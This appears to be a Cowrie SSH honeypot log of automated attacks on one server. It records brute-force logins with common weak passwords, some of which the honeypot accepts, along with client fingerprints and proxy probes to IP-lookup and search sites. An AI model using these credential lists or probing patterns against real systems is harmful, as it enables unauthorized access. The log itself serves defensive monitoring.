{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.772004Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.773066Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.774390Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.login.success","username":"root","password":"00007777","message":"login attempt [root/00007777] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.777748Z","src_ip":"212.227.235.229","session":"7775e0f24ab6"}
{"eventid":"cowrie.login.success","username":"root","password":"11223344","message":"login attempt [root/11223344] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.781462Z","src_ip":"212.227.235.229","session":"d35ca48cc309"}
{"eventid":"cowrie.login.success","username":"root","password":"00003333","message":"login attempt [root/00003333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.866738Z","src_ip":"212.227.235.229","session":"6eb2dbeee33c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.870234Z","src_ip":"212.227.235.229","session":"7775e0f24ab6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.873948Z","src_ip":"212.227.235.229","session":"d35ca48cc309"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.958278Z","src_ip":"212.227.235.229","session":"6eb2dbeee33c"}
{"eventid":"cowrie.login.success","username":"root","password":"100100100","message":"login attempt [root/100100100] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.960439Z","src_ip":"212.227.235.229","session":"cae0391be97c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:50.053365Z","src_ip":"212.227.235.229","session":"cae0391be97c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33772,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a369bfb3227","protocol":"ssh","message":"New connection: 212.227.125.160:33772 (1.2.3.4:22) [session: 7a369bfb3227]","sensor":"my-vps","timestamp":"2025-08-28T17:42:57.281564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:42:57.284614Z","src_ip":"212.227.125.160","session":"7a369bfb3227"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:42:57.513305Z","src_ip":"212.227.125.160","session":"7a369bfb3227"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-28T17:42:59.671418Z","src_ip":"212.227.125.160","session":"7a369bfb3227"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":56294,"dst_ip":"1.2.3.4","dst_port":22,"session":"06b3377dc7e2","protocol":"ssh","message":"New connection: 171.243.150.185:56294 (1.2.3.4:22) [session: 06b3377dc7e2]","sensor":"my-vps","timestamp":"2025-08-28T17:43:00.926458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:43:00.958327Z","src_ip":"171.243.150.185","session":"06b3377dc7e2"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:43:01.460107Z","src_ip":"212.227.125.160","session":"7a369bfb3227"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:43:02.025671Z","src_ip":"171.243.150.185","session":"06b3377dc7e2"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":56316,"dst_ip":"1.2.3.4","dst_port":22,"session":"d19b7595d3b0","protocol":"ssh","message":"New connection: 171.243.150.185:56316 (1.2.3.4:22) [session: d19b7595d3b0]","sensor":"my-vps","timestamp":"2025-08-28T17:43:07.063359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:43:07.071236Z","src_ip":"171.243.150.185","session":"d19b7595d3b0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:43:07.312541Z","src_ip":"171.243.150.185","session":"d19b7595d3b0"}
{"eventid":"cowrie.login.success","username":"root","password":"@","message":"login attempt [root/@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:43:08.116661Z","src_ip":"171.243.150.185","session":"d19b7595d3b0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"171.243.150.185","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T17:43:09.416061Z","session":"d19b7595d3b0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T17:43:09.646211Z","src_ip":"171.243.150.185","session":"d19b7595d3b0"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:43:09.902862Z","src_ip":"171.243.150.185","session":"d19b7595d3b0"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-28T17:43:11.071926Z","src_ip":"171.243.150.185","session":"06b3377dc7e2"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:43:12.295050Z","src_ip":"171.243.150.185","session":"06b3377dc7e2"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":12458,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d6f50b567e6","protocol":"ssh","message":"New connection: 193.105.134.95:12458 (1.2.3.4:22) [session: 9d6f50b567e6]","sensor":"my-vps","timestamp":"2025-08-28T17:43:14.762730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_6.0","message":"Remote SSH version: SSH-2.0-OpenSSH_6.0","sensor":"my-vps","timestamp":"2025-08-28T17:43:14.763629Z","src_ip":"193.105.134.95","session":"9d6f50b567e6"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-28T17:43:14.808278Z","src_ip":"193.105.134.95","session":"9d6f50b567e6"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:43:15.705545Z","src_ip":"193.105.134.95","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":4009,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:4009","sensor":"my-vps","timestamp":"2025-08-28T17:43:15.752968Z","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T17:43:15.797835Z","src_ip":"193.105.134.95","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":16568,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:16568","sensor":"my-vps","timestamp":"2025-08-28T17:43:15.931056Z","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T17:43:15.975773Z","src_ip":"193.105.134.95","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"193.105.134.95","src_port":5560,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:5560","sensor":"my-vps","timestamp":"2025-08-28T17:43:16.107015Z","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T17:43:16.151917Z","src_ip":"193.105.134.95","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"193.105.134.95","src_port":16477,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:16477","sensor":"my-vps","timestamp":"2025-08-28T17:43:16.283154Z","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T17:43:16.328002Z","src_ip":"193.105.134.95","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"77.88.55.88","dst_port":80,"src_ip":"193.105.134.95","src_port":17802,"message":"direct-tcp connection request to 77.88.55.88:80 from 127.0.0.1:17802","sensor":"my-vps","timestamp":"2025-08-28T17:43:16.459013Z","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"77.88.55.88","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 77.88.55.88:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T17:43:16.503685Z","src_ip":"193.105.134.95","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"193.105.134.95","src_port":25297,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:25297","sensor":"my-vps","timestamp":"2025-08-28T17:43:16.635066Z","session":"9d6f50b567e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T17:43:16.679828Z","src_ip":"193.105.134.95","session":"9d6f50b567e6"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:43:16.725863Z","src_ip":"193.105.134.95","session":"9d6f50b567e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63148,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbeec01803ee","protocol":"ssh","message":"New connection: 212.227.235.229:63148 (1.2.3.4:22) [session: bbeec01803ee]","sensor":"my-vps","timestamp":"2025-08-28T17:43:23.657661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:43:23.658542Z","src_ip":"212.227.235.229","session":"bbeec01803ee"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:43:23.881109Z","src_ip":"212.227.235.229","session":"bbeec01803ee"}
{"eventid":"cowrie.login.failed","username":"user","password":"mature","message":"login attempt [user/mature] failed","sensor":"my-vps","timestamp":"2025-08-28T17:43:24.588892Z","src_ip":"212.227.235.229","session":"bbeec01803ee"}
{"eventid":"cowrie.login.failed","username":"user","password":"ivanov","message":"login attempt [user/ivanov] failed","sensor":"my-vps","timestamp":"2025-08-28T17:43:25.749703Z","src_ip":"212.227.235.229","session":"bbeec01803ee"}
{"eventid":"cowrie.login.failed","username":"user","password":"husker","message":"login attempt [user/husker] failed","sensor":"my-vps","timestamp":"2025-08-28T17:43:26.885857Z","src_ip":"212.227.235.229","session":"bbeec01803ee"}
{"eventid":"cowrie.login.failed","username":"user","password":"homerun","message":"login attempt [user/homerun] failed","sensor":"my-vps","timestamp":"2025-08-28T17:43:28.021202Z","src_ip":"212.227.235.229","session":"bbeec01803ee"}
{"eventid":"cowrie.login.failed","username":"user","password":"esther","message":"login attempt [user/esther] failed","sensor":"my-vps","timestamp":"2025-08-28T17:43:29.165735Z","src_ip":"212.227.235.229","session":"bbeec01803ee"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:43:30.326005Z","src_ip":"212.227.235.229","session":"bbeec01803ee"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":52892,"dst_ip":"1.2.3.4","dst_port":22,"session":"55198f2e8555","protocol":"ssh","message":"New connection: 199.195.253.95:52892 (1.2.3.4:22) [session: 55198f2e8555]","sensor":"my-vps","timestamp":"2025-08-28T17:43:33.967528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:43:33.979635Z","src_ip":"199.195.253.95","session":"55198f2e8555"}
